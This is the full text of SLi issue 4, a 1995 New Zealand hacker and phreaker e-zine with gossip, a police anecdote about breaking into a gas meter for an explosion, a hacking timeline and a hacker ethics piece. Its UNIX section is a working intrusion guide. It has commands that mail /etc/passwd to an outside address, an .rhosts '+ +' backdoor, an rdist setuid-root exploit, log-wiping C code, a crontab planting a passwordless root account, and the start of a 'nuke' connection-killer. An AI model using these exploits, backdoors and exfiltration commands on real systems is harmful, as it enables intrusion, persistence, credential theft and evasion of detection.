textfiles/magazines/SLI/sli_004.txt

2758 lines
106 KiB
Plaintext

[ 01/04/95 SLi]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Welcome ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, amazing! SLi IV. Let's see if we can keep this up.
If you want a letter to the editor or something like that
in here, send it (or any comments, etc.. ) to:
SLi
PO Box 3030
Onekawa
Napier
New Zealand
OR
Internet E-mail Address:
HACKER_M@IX.WCC.GOVT.NZ
OR
Call SLi BBS if you can find where it is
Please read SLi I, II & III if you have trouble with
any terms in this mag.
SLi mag written by New Zealanders for New Zealanders!
Oh, before I forget, we have a NEW editor (I'm still here tho').
CyntaxEra is now a Co-Editor and designer of the mag. It's
outlay and overall presentation is her domain, well unless I
get bossy.
.
[ 01/04/95 SLi]
I N D E X
---------
Welcome ........................... Eon
The Rules ......................... Eon
Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
The Police ........................ Eon
Time Line ......................... Eon
Books 2 Read ...................... SLi
[In]Famous Quotes ................. Eon
Honour ............................ Eon
Unix .............................. Compiled by Eon
Busted 4 Nothing .................. Eon/Cyntaxera
The SLi Archive Subject list ...... Eon
Fake Mail ......................... Eon
Elements of Data Deprotection ..... Thorium
Review: 'ToT' ..................... CyntaxEra
SLi ............................... Eon
COCOT Phreaking in NZ ............. CyntaxEra
SmYte List ........................ SLi
Editors Knotez .................... Eon
.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Rules ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, here are the rules for the SLi mag.
The entire mag is (C)opyright 1995 SLi
(1)
If you are working for a business that has some interest in the information
contained in this mag, you must send WRITTEN notification that you are in
possession of this [or any of the other SLi mags] to the following address:
SLi-Comp
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
If you send an IBM formatted 720 disk and a SASE, we will send you the next
SLi mag. A donation of $5 is asked for however - as YOU can aford it (unlike
SOME of our readers).
(2)
This mag may not be edited, and no SINGULAR part may be quoted in any way!
However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be
expected to be paid to the following address BEFORE any such reproduction.
SLi-Payment
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
The fee must be paid in $CASH$. I, the editor, reserve the right
to revoke your rights to reproduce this mag at ANY time.
You may, if you are NOT a company, business or in anyway connected to law
enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies
for no charge.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed
we've managed to get out another issue before anything drastic had happened
to restrict our printing, but even so, tough.
Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the
last issue..)..
Greetz go out to: [in absolutely NO order at all..]
SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to
WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you
still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead,
motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS,
DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent,
UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX,
UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro,
qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby -
(where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d,
Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.
[..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry
- maybe all that p0t actually HAS gone to my head.. ugh. ;)]
Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which
means that there isn't much to talk about.. oh yeah...
CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)
Doesn't that show how little there is to say this time round?! Uh, I guess
I could beg and plead for pieces of gossip to head our way (yup, even BBS ads
will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em..
Well, if there's enuf submitted, that is..)..
Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as
HONEST as I could be without being TOO cutting (I got told I was a little harsh
with the comments, but I felt that they were appropriate - it's only an opinion
so don't take it personally.. =) ). Well, to you other readerz out there who
aren't in ToT, give it a read - you may find it amusing.. =)
Oh, it's a pity that I've been informed that ToT#2 was going to be the last
issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we
hadn't really started out TOO magnificently* Mind you... it was a start].
Telco seems to be backing down for a bit, but that doesn't mean that they've
stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)
[Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she
says. She's a nice woman - just a bit slY <excuse the pun>
WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude
ISNT. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR]
Special note to "THE FLY" - You've pissed me off once too often, and after
hearing of your comments, you'll get what's coming for you. Oh, and I'm sure
you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were
doing a bit of a crackdown on fone-phreaks and your name popped up somehow.
Pity they're too far away to seriously do something about it - don't think
they could be bothered, huh?
That's about it from me.. for now
'Till next issue (well, next article anyway.. ;) )... over and OUT.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Police ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
-The Police-
Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...
We ALL know police, dont we? Now, I thought that police were there to pro-
tect, BUT....
It all happened one EARLY morning - about 5am. We were, uh, well, breaking
into a gas-meter to get some gas to fill a rubbish bag with to make a bit of
a large explosion somewhere in the metropoliton area. Now, sadly :( me and
another individual were smacking the shit outta this gas meter's pipes and
we hear a car driving towards where we were. We [by the way, we were in a
car - not at that moment, obviously] dropped the crowbar [thats what we were
talking to the gas-meter with] and hid behind the car.
Unfortunatly, the police had seen us, so I [holdin' a spanner] tried to look
like we were undoing the wheel [There was a stone in it. Well, that was the
story anyway]. Now, the cops asked us questions, searched our car for drugs
and basicly harrassed us until EXACTLY 6:30am [it mighta been 5:30am].
Anyway, I was informed that that is the EXACT time the police go home, so all
we were was a 'time-waster'.
I must admit that I have lost some respect I had for the boys/'girl-boys' in
blue. The car-driver's mom got called and he got in shit. We had to walk
back and pick up the crowbar we had left 'hidden in plain sight' - they some-
how managed to miss it - and basically, we had a really bad day [morning]...
BTW - Cops ask really STUPID questions!
Cop: Why is there broken glass near that car??
Me: I dunno, but if you were a _real_ detective, you would notice
that the broken glass is nowhere near the broken window.
Obviously the car has been moved since the glass was broken so
we CAN'T have done it.
Cop: You ever had a run in with us before?
Me: [thinking]
What a fucking stupid question to ask! I told you my name so
why don't you just look it up?
[saying]
Just the usual - being out late and getting stopped. Nothing
really.
Cop from
Vice squad: Been smoking any dak? [dak = pot/green plant/cannibis ]
A friend: I wish.
Well, I have no problems with police, except that _SOME_ policewomen have a
really bad attitude and that some policemen thing that they are god's gift
to the world. But, the police do a job that MUST be done. I salute them
for it... BUT, Mr/Ms Police Officer, take my advice and do what is right-
eous and just not necessarally what is legal.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ TIME LINE ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, here we have it. A timeline of events in the H/P world.
Now, I might have screwed up a few things so please no mail bombs
and bear with me.
Information and Dates have been taken from:
"The Hacker Crackdown" ---- Bruce Sterling
"THEFT OF COMPUTER SOFTWARE ____ William J. Cook,
A NATIONAL SECURITY THREAT" Assistant U.S. Attorney
PGP DOX ---- Author Unknown at time of
Publication.
"The History of LOD/H ____
Revision #3 May 1990" Lex Luthor
U.S. Newswire ---- Author Unknown at time of
Articles Publication.
News Artical ____ Barbara E. McMullen and
Pump-Con Bust John F. McMullen
-03/11/1992-
and finally, my own knowlege.
KEY:
Okay, the only major thing I should explain is, the use of
"Sometime." and "Sometime?". A question mark means I'm not sure
WHEN it happened in that year. A "." means I'm not sure of which
month things happened, but it was in this order.
-=[ Our History ]=-
1865:
U.S. Secret Service (USSS) founded.
1876:
Alexander Graham Bell invents telephone.
1878:
First teenage males flung off phone system by enraged
authorities.
1939:
"Futurian" science-fiction group raided by Secret
Service.
1971:
Yippie phone phreaks start YIPL/TAP magazine.
1972:
*Ramparts* magazine seized in blue-box rip-off
scandal.
1978:
Ward Christenson and Randy Suess create first
personal computer bulletin board system.
1982:
William Gibson coins term "cyberspace."
1982:
"414 Gang" raided.
1983-1984:
AT&T dismantled in divestiture.
1984:
Congress passes Comprehensive Crime Control Act
giving USSS jurisdiction over credit card fraud and
computer fraud.
1984:
the U.S. Department of Commerce placed expanded export
controls on computer software as part of its general
protection of technical data deemed vital to the
national defense and security of the United States.
1984:
"Legion of Doom" formed.
January. "PLOVERNET" went online. [A H/P BBS]
Sometime? "LOD BBS" goes online.
Sometime? Groups such as "Fargo 4A" and "Knights of Shadow"
form.
Sometime May?. "KOS" breaks up.
1984:
*2600: The Hacker Quarterly* founded.
1984:
*Whole Earth Software Catalog* published.
1985:
First police "sting" bulletin board systems
established.
1985:
Whole Earth eLectronic Link computer conference (WELL)
goes on-line.
1986:
Computer Fraud and Abuse Act passed in USA.
1986:
Electronic Communications Privacy Act passed in US.
1987:
Chicago prosecutors form Computer Fraud and Abuse
Task Force.
July/September. A Chicago youth attacked AT&T computers at Bell Labs
in Illinois and New Jersey, at a NATO missile support
site in North Carolina, and at Robbins Air Force Base.
1988:
July. Secret Service covertly videotapes "SummerCon" hacker
convention.
September. "Prophet" cracks BellSouth AIMSX computer network and
downloads E911 Document to his own computer and to
Jolnet.
September. AT&T Corporate Information Security informed of
Prophet's action.
October. Bellcore Security informed of Prophet's action.
October. Scotland Yard arrested an English attacker who had
broken into over 200 military, corporate, and
university computers in the United States and Europe.
November 2. A college undergraduate planted a computer virus that
temporarily disabled 6,000 computers on the Internet
[* The Internet Worm *]
December. A search warrant filed by U.S. Customs agents in
Chicago disclosed that a confederate of the Yugoslav
Consul-General in Chicago was using a hacker to attack
defense contractors by remote access in order to steal
computerized information. According to the affidavit,
the information obtained by the hacker was
subsequently smuggled out of the United States in
diplomatic pouches with the help of the Counsel-
General.
1989:
January. Prophet uploads E911 Document to Knight Lightning.
February 25. Knight Lightning publishes E911 Document in *Phrack*
electronic newsletter.
March. It was disclosed that West German hackers sponsored
by Eastern Bloc intelligence agencies had been
systematically searching for classified information
on Government computers throughout the United States
through a weakness in a computer network at a
California university.
[* Pengo and Operation Equilizer *]
March. A member of the Soviet military mission in Washington,
DC, was arrested and expelled from the United States
for attempting to obtain technical information about
how U.S. Government classified information is secured
in computers.
April. Canada expelled 19 Soviet diplomats for wide-ranging
espionage operations to obtain Canadian defense
contractor information for military and commercial
purposes.
May. Chicago Task Force raids and arrests "Kyrie."
June. "NuPrometheus League" distributes Apple Computer
proprietary software.
June 13. Florida probation office crossed with phone-sex line in
switching-station stunt.
July. "Fry Guy" raided by USSS and Chicago Computer Fraud
and Abuse Task Force. July. Secret Service raids
"Prophet," "Leftist," and "Urvile" in Georgia.
1990:
Sometime? PGP (Pretty Good(tm) Privacy) created by
Philip Zimmermann.
January 15. Martin Luther King Day Crash strikes AT&T
long-distance network nationwide.
January 18-19. Chicago Task Force raids Knight Lightning in
St. Louis.
January 24. USSS and New York State Police raid "Phiber Optik,"
"Acid Phreak," and "Scorpion" in New York City.
February 1. USSS raids "Terminus" in Maryland.
February 3. Chicago Task Force raids Richard Andrews' home.
February 6. Chicago Task Force raids Richard Andrews' business.
February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile.
February 9. Chicago Task Force arrests Knight Lightning.
February 20. AT&T Security shuts down public-access "attctc"
computer in Dallas.
February 21. Chicago Task Force raids Robert Izenberg in Austin.
March 1. Chicago Task Force raids Steve Jackson Games, Inc.,
"Mentor," and "Erik Bloodaxe" in Austin.
May 7,8,9. USSS and Arizona Organized Crime and Racketeering
Bureau conduct "Operation Sundevil" raids in
Cincinnatti, Detroit, Los Angeles, Miami, Newark,
Phoenix, Pittsburgh, Richmond, Tucson, San Diego,
San Jose, and San Francisco.
May. FBI interviews John Perry Barlow re NuPrometheus case.
June/July. Mitch Kapor and Barlow found Electronic Frontier
Foundation; Barlow publishes *Crime and Puzzlement*
manifesto. [*The official EFF "about.eff" says
EFF founded in July*]
July 10. Members in LOD pleed guilty
July 24-27. Trial of Knight Lightning.
1991:
Sometime? US Senate Bill 266, a omnibus anti-crime bill,
had an unsettling measure buried in it.
If this non-binding resolution had become real
law, it would have forced manufacturers of secure
communications equipment to insert special "trap
doors" in their products, so that the US Government
can read anyone's encrypted messages.
This measure was defeated after rigorous protest from
civil libertarians and industry groups.
March 25-28. Computers, Freedom and Privacy conference in San
Francisco.
May 1. Electronic Frontier Foundation, Steve Jackson, and
others file suit against members of Chicago Task
Force.
July 1-2. Switching station phone software crash affects
Washington, Los Angeles, Pittsburgh, San Francisco.
July 8. MOD indictment's filed aganced MOD members Julio
Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt,"
Mark Abene, aka. "Phiber Optik," Elias Ladopoulos,
aka. "Acid Phreak," and Paul Stira, aka. "Scorpion,"
February. CPSR Roundtable in Washington, D.C.
September 17. AT&T phone crash affects New York City and three
airports.
1992:
Sometime? FBI Digital Telephony wiretap proposal was introduced
to Congress. It would require all manufacturers of
communications equipment to build in special remote
wiretap ports that would enable the FBI to remotely
wiretap all forms of electronic communication from FBI
offices.
March 11. New York Police Department has announced the arrest of
Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
J. Woodard, 18 for the alleged crimes of Unauthorized
Use Of A computer and Attempted Computer Trespass,
both misdemeanors. Also arrested was Jason A. Brittain
22 in satisfaction of a State of Arizona Fugitive From
Justice warrant. The arrests took place in the midst
of "PumpCon".
1993:
Sometime. SLi BBS goes up in NZ.
March 21. SLi gets national TV coverage from TVNZ.
April 16th. US Government-built encryption device, called the
"Clipper" chip, containing a new classified NSA
encryption algorithm. The Government is encouraging
private industry to design it into all their secure
communication products. The catch: At the time of
manufacture, each Clipper chip will be loaded
with its own unique key, and the Government gets to
keep a copy.
June. DC busts - A 2600 meeting is broken up by mall cops
and police.
1994:
March. TNO [The New Order] gets busted; Flatline BBS is
raided.
Sometime. Unlucky person nailed in Auckland, NZ, for around
$250,000 of fone fraud concerning NZ Telecom
($200,000) and AT&T ($40,000).
Sometime. Phreak in Wellington busted for beige boxing by
Clear Communications, NZ.
Sometime. Big Calling Card investigation in NZ - "Motley" in
Sweeden is busted in conjunction with CC'z - no major
charges are laid.
June 10. "Deathstar" gets busted - no charges laid.
August 6. "Tooph" makes front page news with his alliance conf
calls - One was a call to NZ for 293 mins costing
$306.
Sometime. "MrPurple" busted for US$40,000 worth of conference
charges. [* At time of publication, in jail =( *]
Late/Early95. NZ Telecom hassles Wellington phreaks about VMB
hacking. [how lame!].
1995:
January. Wellington H/P'ers hunted down by Victoria University
(with a little help from local cops) 'cos someone got
'OPERATOR' on their boxes.
[Yeah, wasn't 'root' but it scared 'em enuf!]
Febuary 17. Hacker Busted in USA for 20.000 credit cards
Kevin Mitnick aka Condor
March 22. S.A.M.S.O.N meeting in Wellington, New Zealand
"1. To identify interested parties in joining our
proposed organisation - namely SAMSON - Software
and Modem System Operators Network!
2. To establish and agree on a formal code of ethical
practices for the successful running of a public
BBS." [* well they will wanna shut me down, wont
they! :P *]
-eof-
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ [In]Famous Quotes ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
----Eon,---Grasshopper-+-others---in--a---car----
Eon: "Let's go crash some place."
Grasshopper: "I hope you meant as in sleeping."
Grasshopper: "He's `Joe-average'"
Eon: "He's `Joe-BELOW average'"
George: "I'll lock you out of my Bulletin Board and give you twit
access forever! Ahh ahahahaha!" [spoken in a voice like he
had an award winning carrot up his ass]
Cardinal: "Dial '111' and make a cop come."
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Honor ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Honor.
For a hacker to justify his/her actions, he/she must have a guideline of rules
of morals - a sense of honour. Some do, some dont, but I hope to show you
what Hack/Phreak people's ethics should be, in my opinion.
1. For a start, injuring a single person;
CC abuse is wrong. It is not ethical. Our fight is not against the
little man or woman - our fight is against the profiteering companies
and hiracial[sp?] government departments. We do not steal from the
poor, and the helpless, and in a sense, that is what CC fraud is most
of the time. Sure, occasionally you get some rich guy with 40 grand
in his account, but those times are few and in between. Basically CC
fraud is out.
<Of course, if a company is "lame" enough to accept a checksum's cre-
dit card - it's up to you!>
Beige boxing is out also, unless you're phreaking from an embassy,
government department or Telecom [AT&T, Telco.. etc...] phone box.
2. You're not a anarchist [in the explosive terms]. It only gives us a bad
name.
3. Destroying data, except for covering your tracks, is out.
4. Your world is that of the computer and the phone. Our world is safe
from the problems of racial prejudice, sexual descrimination, descrim-
inate by what someone says - not what they look like, sound like, or
what there beliefs are.
5. Our word of honour is PERMANENT. If given, NEVER break it. If you do,
you are no more worthy of your position in society as a murderer or a
rapist.
6. Respect all others' points of view - even if it is foolish.
7. NEVER attack anything if it hasn't done anything to you.
[Hmm, does that include kicking poor, little, defenseless PUPPIES!?]
8. Don't talk behind others' backs. If you want to say something, say it to
their face. Only dishonourable people dont tell people what they think,
but tell others instead. <maybe I should take notice of this one!>
Remember, our war is the war that will shape the future. If we are not
ever diligent, we will lose our rights as an individual - we will become
nothing more than a number. Governments love numbers, as do all money
making companies. Protect the little free speech and the few rights we
have left. Protect them well, my brethren, for we will need it one day
more than we will need anything else.
Above all, our war is directed at big businesses and governments, not towards
random people in our streets.
Eon.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ UNIX ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors
can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS
but 486's, 386's, Pentiums, and the like, can run it. SUN box's and VAX's
can run it. In fact, that's the amazing thing about Unix - it's PORTABLE!
Anyway, away from the dribble.
I guess I'll start at the top.
Basic UNIX username/password prompt:
login:
Password:
This CAN be changed. After all, with UNIX, you get the source to everything.
One good thing with UNIX is that the password file is globally readable unless
the system administrator has enabled a shadow password system - not standard
with unix. The passwords are in:
/etc/passwd
Mind you this can be changed also. After all, with UNIX, you get the source
to everything.
A UNIX passwd file looks like this:
root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh
The layout may differ from UNIX's, but this is the standard layout:
Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
You will notice that the second field is the password one. UNIX uses a one-
way password encryption system. When you login, and type your password, it
encrypts your input and compares the users password field to what you entered.
If it is the same, you've got the password right.
Say you want to crack the passwords. You have to do the same. Encrypt a se-
quence of letters/numbers/symbols and compare them to the passsword file.
Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..".
What you get is a dictionary file which looks like this:
autistic
auto
autobiography
autoclave
autocollimate
autocorrelate
autocracy
autocrat
autocratic
autograph
automat
automata
automate
automatic
The reason for this - using dictionary words - is that a LOT of people just
use common words as their passwords. Having to attack "Crack" using every
number/letter/symbol sequence UNIX can handle would take a LONG time.
The names of some good proggies that crack these passwords are:
Program Name File Name <> OS
~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~
Cracker Jack jack13.zip/jack.zip <PC Only - VERY FAST!!>
Killer Cracker kc9??.zip <Anything. After all, you get the
source to it>
Useful commands to type WHENEVER you get onto ANY UNIX system:
[] = Don't type - instructions
* = What you type
This will "type" the password file to your terminal:
[open a capture if on a modem link]
*cat /etc/passwd [or]
*ypcat passwd
This will mail you via internet with the password file:
*cat /etc/passwd |mail -s passwordfile [where you want to send the file to via
internet mail; ie. bloggs@some.where.com]
ypcat passwd | mail -s passwordfile [where you want to send the file to via
internet mail; ie.bloggs@some.where.com]
Also type this:
*echo + + >> ~/.rhosts
This will allow you (if it's installed) for you to type:
*rsh <system.name.you.echoed.that.to> -l <UsernameOfUserYouUsed> /bin/sh -i
Okay, so that is say, the user you echoed + + on was called "bob" on
lame.aol.com, you would type:
*rsh lame.aol.com -l bob /bin/sh -i
This might or might not work, depending on how the system is setup, but if
you were on lame.aol.com, it's a reasonable bet after typing that command you
would then become bob with his rights, and access to his files.
Well I thought about it and decided to put some useful source in here for
those interested.
Okay, this piece of shell script on non-patched systems will give you root.
Upload this file into a directory as <filename>.
When in shell on the UNIX box type:
*chmod 777 <filename>
*./<filename>
*/tmp/." "
If a # appears, type:
*whoami
If it says "root" you have root on that UNIX box.
NB: Because of the way this file is, where ! is wrap the nextline onto that
line and delete the "!" - except for the "#!" on the first line.
---------------------------CUT----------------------------8<------------------
#!/bin/sh
SUID=/tmp/." "
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
-------------------------CUT-------------------------------8<------------------
The program following will hide you on a UNIX box.
It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if
you are root.
-------------------------CUT-------------------------------8<------------------
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>
int f;
void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}
-----------------------------CUT---------------------------8<------------------
When you get root, find where the crontabs are put, and type this:
*cat <WhatYouCallThisFileName> >> <crontabdir>/root
-------------->8--------------Cuthere------------------------------------------
0 1 * * * cp /etc/passwd /var/adm/". "
1 1 * * * chmod +w /etc/passwd
2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd
1 2 * * * mv /var/adm/". " /etc/passwd
2 2 * * * chmod -w /etc/passwd
-------------->8--------------Cuthere------------------------------------------
At 1-2 AM, there will be an account called "blah" with root access every day
created with no password.
This will nuke the IP connection between two computers:
*./nuke <TargetUsers> <ComputerThat'sConnectingTargetComputer> <Port#ToKill>
-------------->8--------------Cuthere------------------------------------------
/*
* nuke.c version 1.0 04/25/92
* by Satanic Mechanic.
* must be root to open raw sockets. this version will kill
* almost any ip connection.
* ----------------------------------------------------------------
* I strongly advise against even compiling this software. It's far
* too dangerous, and the temptation may be there to do some real
* damage with it. Read and learn, that's it, eh? -concerned
* ----------------------------------------------------------------
*
*/
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#define DEFAULT_UNREACH ICMP_UNREACH_PORT
char *icmp_unreach_type[] = {
"net",
"host",
"protocol",
"port",
"frag",
"source",
"destnet",
"desthost",
"isolated",
"authnet",
"authhost",
"netsvc",
"hostsvc"
};
#define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))
int resolve_unreach_type(arg)
char *arg;
{
int i;
for (i=0; i <MAX_ICMP_UNREACH; i++) {
if (!strcmp(arg,icmp_unreach_type[i])) return i;
}
return -1;
}
int resolve_host (host,sa)
char *host;
struct sockaddr_in *sa;
{
struct hostent *ent ;
bzero(sa,sizeof(struct sockaddr));
sa->sin_family = AF_INET;
if (inet_addr(host) == -1) {
ent = gethostbyname(host);
if (ent != NULL) {
sa->sin_family = ent->h_addrtype;
bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length);
return(0);
}
else {
fprintf(stderr,"error: unknown host %s\n",host);
return(-1);
}
}
return(0);
}
in_cksum(addr, len) /* from ping.c */
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum),
* we add sequential 16 bit words to it, and at the end, fold
* back all the carry bits from the top 16 bits into the lower
* 16 bits.
*/
